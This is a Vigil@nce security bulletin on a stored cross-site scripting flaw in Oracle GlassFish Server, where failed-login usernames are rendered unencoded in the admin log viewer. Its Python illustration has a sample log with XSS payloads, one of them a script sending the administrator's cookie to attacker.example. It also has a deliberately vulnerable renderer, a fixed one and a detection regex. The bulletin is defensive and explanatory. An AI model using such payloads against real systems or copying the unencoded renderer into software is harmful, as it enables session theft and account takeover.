Vigil@nce - Oracle GlassFish Server: Cross Site Scripting via login
August 2011 by Vigil@nce
This bulletin was written by Vigil@nce : http://vigilance.fr/offer
SYNTHESIS OF THE VULNERABILITY
An attacker who can reach the administration interface of Oracle
GlassFish Server can submit a crafted login name, so that JavaScript
of his choosing runs in the browser of the administrator who later
views the server logs.
Severity: 2/4
Creation date: 20/07/2011
IMPACTED PRODUCTS
– Oracle GlassFish Enterprise Server
DESCRIPTION OF THE VULNERABILITY
The web administration interface of Oracle GlassFish Server
listens on port 4848/tcp. A login and a password are required to
access this interface.
Each failed authentication attempt is logged, together with the
username that was submitted. The administrator can later read the
logs through the administration interface and see the username of
the failed attempt.
However, the login name entered by the user is not sanitised before
it is written to the log. Moreover, log records are not HTML-encoded
when the administration interface displays them. A login name that
contains HTML or JavaScript markup is therefore stored verbatim and
rendered as live markup in the log page, i.e. in the browser of the
administrator who views it (a stored Cross Site Scripting). No valid
credentials are needed to plant the payload: only network access to
the login page of port 4848/tcp.
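The following Python script is an added illustration written for this bulletin; it is not GlassFish code and it does not use the real GlassFish log format. It assumes a simplified record layout "[#|timestamp|level|source|message|#]" and a constructed failed-login message "Web login failed for user <name>". It contrasts a log viewer that inserts the message into HTML verbatim (the flaw described above) with one that HTML-encodes every field (the fix), and it shows the check an administrator can run over the log to spot login names that carry markup before opening them in a browser-based viewer.

```python
import html
import re

# Constructed sample log (not real GlassFish output). The layout is an
# assumption made for this example; only the idea matters: the username
# of a failed login lands in the message field unchanged.
SAMPLE_LOG = """\
[#|2011-07-20T10:15:32.123+0200|WARNING|security.auth|Web login failed for user admin|#]
[#|2011-07-20T10:15:40.456+0200|WARNING|security.auth|Web login failed for user <script>document.location='http://attacker.example/?c='+document.cookie</script>|#]
[#|2011-07-20T10:16:01.789+0200|INFO|security.auth|Web login succeeded for user admin|#]
[#|2011-07-20T10:16:20.000+0200|WARNING|security.auth|Web login failed for user "><img src=x onerror=alert(1)>|#]
"""

RECORD_RE = re.compile(
    r"^\[#\|(?P<ts>[^|]*)\|(?P<level>[^|]*)\|(?P<source>[^|]*)\|(?P<msg>.*)\|#\]$"
)
FAILED_LOGIN_RE = re.compile(r"^Web login failed for user (?P<user>.*)$")
# Characters and tokens that have no business in a username but are
# needed to break out of an HTML context or to attach a script.
MARKUP_RE = re.compile(r"[<>\"'&]|javascript:|on\w+\s*=", re.IGNORECASE)


def parse_log(text):
    """Split the (assumed) record layout into dicts; skip unparseable lines."""
    records = []
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if m:
            records.append(m.groupdict())
    return records


def render_log_vulnerable(records):
    """Mirrors the flaw: fields are concatenated into HTML with no encoding,
    so markup inside a logged username becomes part of the page."""
    rows = "".join(
        f"<tr><td>{r['ts']}</td><td>{r['level']}</td><td>{r['msg']}</td></tr>"
        for r in records
    )
    return f"<table>{rows}</table>"


def render_log_hardened(records):
    """Same page, but every field is HTML-encoded at output time, so the
    browser shows the payload as text instead of executing it."""
    esc = lambda s: html.escape(s, quote=True)
    rows = "".join(
        f"<tr><td>{esc(r['ts'])}</td><td>{esc(r['level'])}</td><td>{esc(r['msg'])}</td></tr>"
        for r in records
    )
    return f"<table>{rows}</table>"


def find_suspicious_usernames(records):
    """Detection side: return (timestamp, username) for failed logins whose
    username contains HTML/JavaScript markup, i.e. a likely XSS attempt."""
    hits = []
    for r in records:
        m = FAILED_LOGIN_RE.match(r["msg"])
        if m and MARKUP_RE.search(m.group("user")):
            hits.append((r["ts"], m.group("user")))
    return hits


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("vulnerable page contains raw <script>:",
          "<script>" in render_log_vulnerable(recs))
    print("hardened page contains raw <script>:",
          "<script>" in render_log_hardened(recs))
    for ts, user in find_suspicious_usernames(recs):
        print(f"{ts}: suspicious login name {user!r}")
```

The hardened renderer encodes at the point of output rather than trying to strip "dangerous" characters at login time; input filtering on the username is a useful second layer, but the log viewer must still treat every logged string as untrusted data, since other log sources (HTTP headers, application messages) reach the same page. The detection regex is deliberately broad: a quote or ampersand in a username is rare enough that a false positive costs only a glance.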
An attacker who can reach the administration interface of Oracle
GlassFish Server can therefore submit a crafted login name, so that
JavaScript of his choosing runs in the browser of the administrator
who later views the server logs.
ACCESS TO THE COMPLETE VIGIL@NCE BULLETIN
http://vigilance.fr/vulnerability/Oracle-GlassFish-Server-Cross-Site-Scripting-via-login-10858